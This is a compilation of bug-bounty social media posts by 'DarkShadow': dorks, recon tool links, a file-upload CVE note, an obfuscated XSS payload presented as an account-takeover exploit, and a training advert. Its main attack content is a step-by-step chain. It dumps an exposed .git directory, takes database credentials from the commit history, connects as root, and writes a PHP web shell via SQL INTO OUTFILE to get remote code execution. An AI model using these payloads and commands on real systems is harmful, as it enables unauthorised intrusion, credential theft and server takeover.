Hey Hunter's,
DarkShadow here, back again just dropping a POC.

🤫Unauthenticated WordPress Auth bypass 🔥

After sending the 1st request use the provided last Cookie and send request on /wp-admin and BOOM auth bypassed 💥


#bugbountytips  #authbypass

Hey Hunter's,
DarkShadow here ...

🔥Is that Cool?

Hey Hunter's,
DarkShadow here back again, just dropping a dork🤫

✨google dork searching public exploits from github😎

"CVE-YYYY-NNNN" exploit site:github.com

"CVE-YYYY-NNNN" exploit POC site:github.com

"CVE-YYYY-NNNN" proof of concept site:github.com

#dork #bugbountytips

🚨 Brut Security - New Batch Starts 18th August!

Join our Ethical Hacking Network Pentesting & Web Pentesting / Bug Bounty training – practical sessions, real-world attacks, and community support from Day 1.

✅ DM +918945971332 to enroll. Limited slots.
⭐https://wa.me/918945971332

Hey Hunter's,
DarkShadow hare back again.

𝘿𝙖𝙧𝙠𝙀𝙣𝙙𝙁𝙞𝙣𝙙𝙚𝙧 my own private tool which i used to extract endpoints from browse through passive recon.

✨ Features:
✅ Extract subdomains.
✅ Extract categories endpoints from subdomains.
✅ Extract external domains.

If you find this tool useful, give it a ⭐️ and share it with others in the hacking & BugBounty community!

https://github.com/darkshadow2bd/DarkEndFinder

Bug Hunters Methodology v4
@Jason Haddix

CVE-2025-7443: Unrestricted Upload of File with Dangerous Type in BerqWP Plugin, 8.1 rating❗️

Lack of file validation allows attackers to upload arbitrary files, which can lead to RCE.

Search at Netlas.io:
👉 Link: https://nt.ls/puxoz
👉 Dork: http.body:"plugins/searchpro"

Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-2242-unauthenticated-arbitrary-file-upload

Hey Hunter's,
DarkShadow here back again!

SubClick One-click Subdomain Finder Bookmark template.

This is my private tool that I use during bug hunting.
If you guys like it, I’ll publish it on my GitHub.
I’ve uploaded a sample video demo — let me know what you think!

🧠 Features
✅ One-click execution – just add to bookmarks and click
✅ No setup required – works as a browser bookmarklet
✅ Fast subdomain discovery from multiple public sources
✅ Subdomain live check (best-effort, despite CORS/CSP)
✅ Download results as .txt directly from the browser
✅ Displays subdomains as clickable links with basic status
✅ Fully client-side – no server or data collection involved
✅ Bug bounty friendly – made for recon & live target scanning

#bugbountytips #infosec

Hey Hunter's,
DarkShadow here back again dropping my own private tool now!

SubClick is now available in my GitHub repo.

Collect subdomains in just one click! Bookmark – visit target – click – done ✅

https://github.com/darkshadow2bd/SubClick

✨If it is helpful give a ⭐ in GitHub

#bugbountytips #infosec

Hey Hunter's,
DarkShadow here back again, dropping a recent XSS patch in Paytm!

👀Step to reproduce:
1. Enter the payload in search box
2. Grape the URL.
3. Send it to the victim.
4. One click account takeover!


✅Payload:

<svg onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>

Cradit ~ @TEAM_DH049

#bugbountytips #xss

Hey Hunter's,
DarkShadow here  back again, dropping one of my secret methodologies that turns a full Remote Code Execution!


💥 From /.git to FULL RCE – The Ultimate Git-Based Exploitation Chain🔥

🎯 Target: Exposed .git/ Directory

You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging fruit misconfiguration?
Think again — we’re about to break that into Critical RCE 🔥

🔍 Tip: Use Chrome extensions like DotGit, GitHound, or your any favorite fuzzing tools.

⚙️ Step-by-Step Exploitation
Step 1: Dump the Git Repo

Use GitDumper from GitTools:

git clone https://github.com/internetwache/GitTools
cd GitTools/Dumper
bash gitdumper.sh https://target.com/.git/ webCode

👉 This tool will recursively download the entire .git repository into /webCode

Step 2: Reconstruct the Source Code

cd webCode
git checkout .

✅ This restores all files from the latest commit, giving you full access to the source code.

Step 3: Explore Git History for Secrets

git log -p

Look for hardcoded credentials, tokens, DB configs, etc.

📌 Realistic Example:

commit 3b95f2c798a12427a1234b6d1234567890abcdef
Author: dev_admin <[email protected]>
Date:   Thu Jul 11 17:32:15 2024 +0000

    Added database config

diff --git a/config.php b/config.php
new file mode 100644
+++ b/config.php
@@ -0,0 +1,6 @@
+<?php
+$db_host = "258.20.78.55";
+$db_user = "root";
+$db_pass = "master_!pass2020";
+$db_name = "production";
+?>

We’ve got database password!

Step 4: Connect to the Database

mysql -h 258.20.78.55 -u root -p'master_!pass2020'

Step 5: Escalate to RCE via SQL

Check your privileges:

SHOW GRANTS FOR CURRENT_USER;

✅ If You Have FILE Privilege:

Write a web shell to the web root:

SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';

Then browse:

https://target.com/shell.php?cmd=id

Boom 💥 — Remote Code Execution on the box!

If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X 👉🏼 x.com/darkshadow2bd

#bugbountytips

Is there Anyone from uwo.ca
western University

Need to quickly check for exposed backup files? Check out fuzzuli, a simple tool by @musana to quickly check for sensitive files! 🤠

🔗 github.com/musana/fuzzuli